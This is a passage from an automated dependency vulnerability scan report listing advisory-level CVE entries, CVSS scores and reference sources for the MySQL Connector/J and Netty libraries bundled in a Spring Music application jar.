Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:mysql:mysql-connector-java:5.1.46:*:*:*:*:*:*:* CVE-2020-2934 suppress
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.19 and prior and 5.1.48 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Connectors. CVSS 3.0 Base Score 5.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L). NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.0) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-2875 suppress
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.14 and prior and 5.1.48 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.0 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N). NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2020-2933 suppress
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 5.1.48 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Connectors. CVSS 3.0 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). NVD-CWE-noinfo
CVSSv3:
Base Score: LOW (2.2) Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L/E:0.7/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: netty-codec-4.1.23.Final.jarDescription:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients. License:
http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/netty-codec-4.1.23.Final.jar
MD5: d23ad9338741a1d660c68a9d0cac4c6d
SHA1: d6599803bfefbe9a3e226702faade5df0cb678d1
SHA256: c6177cb91f9c065b416530f8ecc495cec3e457652e9bfdc5b21e10effcb23ee2
Evidence Type Source Name Value Confidence Vendor file name netty-codec High Vendor jar package name codec Highest Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.codec Medium Vendor Manifest bundle-docurl http://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.codec Medium Vendor Manifest implementation-url http://netty.io/netty-codec/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor pom artifactid netty-codec Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Codec High Vendor pom parent-artifactid netty-parent Low Product file name netty-codec High Product jar package name codec Highest Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.codec Medium Product Manifest bundle-docurl http://netty.io/ Low Product Manifest Bundle-Name Netty/Codec Medium Product Manifest bundle-symbolicname io.netty.codec Medium Product Manifest Implementation-Title Netty/Codec High Product Manifest implementation-url http://netty.io/netty-codec/ Low Product pom artifactid netty-codec Highest Product pom groupid io.netty Highest Product pom name Netty/Codec High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.23.Final High Version Manifest Implementation-Version 4.1.23.Final High Version pom version 4.1.23.Final Highest
CVE-2019-20444 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-20445 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2019-16869 suppress
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11612 suppress
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2020-11612] CWE-789: Uncontrolled Memory Allocation OSSIndex - https://github.com/netty/netty/issues/9924 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
CISA Known Exploited Vulnerability: Product: IETF HTTP/2 Name: HTTP/2 Rapid Reset Attack Vulnerability Date Added: 2023-10-10 Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS). Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Due Date: 2023-10-31 Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - PRODUCT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - BROKEN_LINK cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING 